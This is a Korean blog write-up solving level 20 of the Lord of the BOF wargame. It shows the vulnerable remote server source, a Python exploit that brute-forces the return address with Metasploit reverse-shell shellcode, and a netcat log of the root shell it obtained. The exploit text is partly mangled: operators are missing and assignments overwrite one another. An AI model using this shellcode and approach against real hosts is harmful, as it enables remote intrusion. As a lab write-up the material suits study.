sweetchip's blog


BOB과제로 FTZ풀다가 급생각나서 LOB도 풀어보는데 재미있다.


레벨 20에서는 remote exploit이 등장하는데 먼저 소스코드를 보면


[xavius@localhost xavius]$ cat death_knight.c

/*

The Lord of the BOF : The Fellowship of the BOF

- dark knight

- remote BOF

*/


#include

#include

#include

#include

#include

#include

#include

#include

#include


main()

{

char buffer[40];


int server_fd, client_fd;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int sin_size;


if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

perror("socket");

exit(1);

}


server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(6666);

server_addr.sin_addr.s_addr = INADDR_ANY;

bzero(&(server_addr.sin_zero), 8);


if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

perror("bind");

exit(1);

}


if(listen(server_fd, 10) == -1){

perror("listen");

exit(1);

}


while(1) {

sin_size = sizeof(struct sockaddr_in);

if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

perror("accept");

continue;

}


if (!fork()){

send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

send(client_fd, "You : ", 6, 0);

recv(client_fd, buffer, 256, 0);

close(client_fd);

break;

}


close(client_fd);

while(waitpid(-1,NULL,WNOHANG) > 0);

}

close(server_fd);

}



40바이트만큼 buffer가 있는 상태지만 256만큼 받아버려서 BOF가 발생한다.


스택의 구조를


[data...]| [buffer][sfp][ret] |[data...]


으로 예상하고 exploit을 작성했다


from socket import * from struct import pack p = lambda x: struct.pack(",x) # linux/x86/shell_reverse_tcp - 95 bytes # Encoder: x86/shikata_ga_nai # VERBOSE=false, LHOST=*, LPORT=*, shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8" "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80" "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01" "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16" "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f" "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0" "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66") HOST = "192.168.0.29" PORT = 6666 limit = 256 - 1 print len(shellcode) print "[*] Sending Exploit Codes.." for i in range(0xff,0x00,-1): for j in range(0,0xff,100): s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) s.recv(1207) exploit = "" exploit = "\x90"*40 # offset exploit = "\x90"*4 # sfp exploit = chr(j) chr(i) "\xff\xbf" # ret exploit = "\x90"*(limit-len(shellcode)-len(exploit)) # slide exploit = shellcode # shellcode s.send(exploit) print "PWNED?" s.close()


* 쉘코드는 리버스쉘이고 metasploit으로 제작되었습니다.


J:\fedora_exploit\TheLordOfTheBOF_redhat>lob20.py

[*] Sending Exploit Codes..

pwned?


C:\Users\sweetchip\Desktop>nc -lvp *

listening on [any] * ...

192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.2] from (UNKNOWN) [192.168.0.1] 1045: NO_DATA

id

uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)

my-pass

euid = 520

g** *** ****


[death_knight@localhost death_knight]$ cat dropped_item.txt

You're so great! This is a token to the next gate.

,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'


Exploit을 성공하고 root 쉘을 획득했다.


신고

댓글 0